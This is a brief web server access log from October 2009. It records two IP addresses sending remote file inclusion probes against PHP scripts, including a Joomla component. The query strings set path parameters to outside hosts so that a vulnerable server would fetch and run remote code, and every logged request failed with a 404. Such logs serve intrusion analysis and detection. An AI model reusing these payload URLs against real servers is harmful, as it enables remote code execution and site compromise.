206.225.23.4 - - [18/Oct/2009:03:31:15 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:31:15 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:31:16 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:31:16 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:31:21 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:31:21 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:03:32:00 -0400] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:03:32:00 -0400] "GET /logs/access_log.Q109051500//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:03:32:00 -0400] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
